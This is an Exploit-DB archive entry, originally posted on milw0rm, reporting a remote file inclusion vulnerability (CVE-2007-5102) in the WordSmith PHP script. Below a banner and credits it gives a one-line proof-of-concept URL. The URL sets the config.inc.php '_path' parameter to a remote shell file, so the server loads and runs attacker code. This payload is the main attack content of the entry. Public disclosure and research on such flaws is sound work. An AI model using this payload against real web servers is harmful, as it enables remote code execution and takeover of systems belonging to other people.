Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion
Author: ShockShadow
type: webapps
platform: php
port:
date_added: 2007-09-22
date_updated: 2016-10-12
verified: 1
codes: OSVDB-37223;CVE-2007-5102
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comwordsmith1.1_RC1.zip
--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+ WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion +==--
--==+================================================================================+==--
Software: WordSmith 1.0 RC1
SF page: http://sourceforge.net/news/?group_id=90418
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://skrypty.webpc.pl/pobierz13.html
##############################
==============
Dork: built in ;)
PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################
by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS
# milw0rm.com [2007-09-23]